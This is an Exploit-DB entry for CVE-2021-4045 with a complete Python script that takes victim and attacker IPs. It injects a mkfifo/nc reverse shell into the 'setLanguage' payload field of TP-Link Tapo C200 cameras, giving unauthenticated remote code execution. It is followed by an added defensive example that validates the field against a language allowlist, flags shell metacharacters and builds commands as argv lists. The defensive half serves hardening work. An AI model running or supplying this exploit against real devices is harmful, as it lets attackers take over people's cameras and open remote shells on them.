[webapps] TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
source link: https://www.exploit-db.com/exploits/51017
```python
# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
# Date: 02/11/2022
# Exploit Author: hacefresko
# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/
# Version: 1.1.15 and below
# Tested on: 1.1.11, 1.1.14 and 1.1.15
# CVE : CVE-2021-4045
# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce

import requests, urllib3, sys, threading, os

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

PORT = 1337
REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
NC_COMMAND = 'nc -lv %d' % PORT  # nc command to receive reverse shell (change it depending on your nc version)

if len(sys.argv) < 3:
    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")
    exit()

victim = sys.argv[1]
attacker = sys.argv[2]

print("[+] Listening on %d" % PORT)
t = threading.Thread(target=os.system, args=(NC_COMMAND,))
t.start()

print("[+] Serving payload to %s\n" % victim)
url = "https://" + victim + ":443/"
json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
requests.post(url, json=json, verify=False)
```
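The request above shows the root cause: the `payload` field of the `setLanguage` method is spliced into a single-quoted shell command, so a value that closes the quote and adds `;` runs as code. The following is an added example (not code from the exploit, the write-up, or TP-Link) of how the receiving handler should treat that field: validate it as a language tag against an allowlist, flag shell metacharacters for logging, and build the command as an argv list rather than a shell string. The allowlist and the `/usr/bin/set_lang` helper path are assumptions.

```python
import json
import re

# Constructed allowlist; the camera's real language list is not given on the page.
ALLOWED_LANGUAGES = {"en", "de", "es", "fr", "it", "zh_CN"}

# A language tag is two letters, optionally followed by "_" and two letters.
LANG_TAG = re.compile(r"[A-Za-z]{2}(?:_[A-Za-z]{2})?")

# Characters that only make sense if the value is being spliced into a shell line;
# a legitimate client never sends them, so a hit is worth logging on its own.
SHELL_META = re.compile(r"[;|&`$'\"<>(){}\s]")


def check_set_language(body):
    """Validate a body of the shape the camera accepts,
    {"method": "setLanguage", "params": {"payload": "<tag>"}}.
    Returns (accepted, value_or_reason). Nothing here touches a shell."""
    try:
        req = json.loads(body)
    except ValueError:
        return False, "invalid json"
    if not isinstance(req, dict) or req.get("method") != "setLanguage":
        return False, "unexpected method"
    params = req.get("params")
    payload = params.get("payload") if isinstance(params, dict) else None
    if not isinstance(payload, str):
        return False, "payload missing or not a string"
    if SHELL_META.search(payload):
        return False, "payload contains shell metacharacters"
    if not LANG_TAG.fullmatch(payload):
        return False, "payload is not a language tag"
    if payload not in ALLOWED_LANGUAGES:
        return False, "language not supported"
    return True, payload


def set_language_argv(body):
    """Build the command as an argv list for subprocess.run(argv) with shell=False,
    so even a value that slipped past validation is one argument, not code.
    /usr/bin/set_lang is a hypothetical placeholder for the firmware's helper."""
    accepted, value = check_set_language(body)
    if not accepted:
        raise ValueError(value)
    return ["/usr/bin/set_lang", "--lang", value]
```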